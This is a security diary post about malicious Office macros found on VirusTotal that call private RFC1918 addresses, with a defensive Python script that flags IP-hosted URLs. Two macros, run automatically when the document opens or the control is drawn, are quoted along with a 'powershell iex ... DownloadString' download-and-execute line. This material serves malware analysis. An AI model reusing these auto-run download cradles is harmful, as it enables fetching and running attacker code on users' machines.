Private IP Addresses in Malware Samples?

I'm looking for some samples on VT that contain URLs with private or non-routable IP addresses (RFC1918)[1]. I found one recently and it made me curious. Why would a malware try to connect to a non-routable IP address?

Here is an example of a macro found in a suspicious Word document (SHA256: c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a)[2]:

Sub AutoOpen()
' test Macro
' Runs automatically when the document is opened and downloads a file over HTTP
' into %TEMP%\loader.dll. The first string argument is the URL; it pointed at a
' private (RFC1918) address in the sample and has been removed from this listing.
x = URLDownloadToFileA(0, "", Environ("TEMP") & "\loader.dll", 0, 0)

End Sub

This one seems to be still under development and does not look too dangerous. But wait: using VirusTotal can be very sensitive depending on your context, and submitting files to VirusTotal must be done carefully. If you are a blue-teamer, uploading a sample might tip off the attacker and let him know that you're looking at him. If you're a red-teamer, uploading your self-made sample might help AV vendors improve their detection mechanisms.

Here is another one, found in another document with a higher VT score (22/57)[3]:

Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    ' Event handler of an embedded InkPicture ActiveX control: fires when the control is drawn,
    ' which happens without the user doing anything. The URL passed to DownloadString
    ' (a private IP address in the sample) has been removed from this listing.
    strCommand = "powershell iex (New-Object Net.WebClient).DownloadString('')"
    Set WshShell = CreateObject("WScript.Shell")
    Set WshShellExec = WshShell.Exec(strCommand)
    strOutput = WshShellExec.StdOut.ReadAll
    MsgBox strOutput
End Sub

Besides classic macros, I also found a lot of DLLs and DEX files (Dalvik Executables from Android applications) that contain URLs with RFC1918 IP addresses. I think that most of them are samples still being tested/developed.
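To hunt for this pattern locally rather than on VT, here is a small triage script (an added example, not part of the original diary) that scans text extracted from a sample, for instance the output of olevba or strings, for URLs whose host is an IPv4 address, and labels each host as RFC1918, loopback, link-local, CGNAT (100.64/10) or public. The sample input is constructed to mimic the macros above; every IP address in it belongs to a private, test or reserved range. The function and label names are my own choices.

```python
import ipaddress
import re
from typing import List, Tuple

# Matches http(s) URLs whose host is a dotted-quad IPv4 address, with an
# optional port and path. Deliberately simple: it is meant for strings
# dumped from macros, DLLs or DEX files, not for full URL validation.
URL_RE = re.compile(
    r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d{1,5})?(?:/[^\s'\"<>)]*)?",
    re.IGNORECASE,
)

# The three RFC1918 blocks, checked explicitly rather than via is_private,
# which in Python also covers documentation and other reserved ranges.
RFC1918_NETS = [
    ipaddress.IPv4Network("10.0.0.0/8"),
    ipaddress.IPv4Network("172.16.0.0/12"),
    ipaddress.IPv4Network("192.168.0.0/16"),
]
CGNAT_NET = ipaddress.IPv4Network("100.64.0.0/10")  # RFC 6598 shared address space


def classify_ip(addr: str) -> str:
    """Label an IPv4 address string for triage.

    Returns one of: 'rfc1918', 'loopback', 'link-local', 'cgnat',
    'other-nonglobal' (test-nets, multicast, reserved...), 'public'
    or 'invalid' (e.g. 300.1.1.1, which the regex happily matches).
    """
    try:
        ip = ipaddress.IPv4Address(addr)
    except ipaddress.AddressValueError:
        return "invalid"
    if any(ip in net for net in RFC1918_NETS):
        return "rfc1918"
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"
    if ip in CGNAT_NET:
        return "cgnat"
    if not ip.is_global:
        return "other-nonglobal"
    return "public"


def extract_urls(text: str) -> List[Tuple[str, str, str]]:
    """Return (url, host, label) for every IPv4-hosted URL found in text, in order."""
    hits = []
    for m in URL_RE.finditer(text):
        host = m.group(1)
        hits.append((m.group(0), host, classify_ip(host)))
    return hits


def non_routable_hits(text: str) -> List[Tuple[str, str, str]]:
    """The URLs worth a second look: every hit that is not a public address."""
    return [h for h in extract_urls(text) if h[2] not in ("public", "invalid")]


# Constructed sample: lines of the kind olevba/strings would print for the
# macros discussed above. None of these addresses is a real C2 server.
SAMPLE_STRINGS = """
x = URLDownloadToFileA(0, "http://192.168.1.20/loader.dll", Environ("TEMP") & "\\loader.dll", 0, 0)
powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8080/stage.ps1')
http://127.0.0.1/test
http://198.51.100.23/update.php
http://100.64.3.9/beacon
"""

if __name__ == "__main__":
    for url, host, label in extract_urls(SAMPLE_STRINGS):
        print(f"{label:16} {host:16} {url}")
```

Running it prints one line per URL with its label. A private destination is a useful triage signal but not proof that a sample is unfinished: it can also be a stage hosted on an already compromised machine inside the victim's network, so treat the address in the context of where the sample was collected.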


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant



Sep 5th 2019
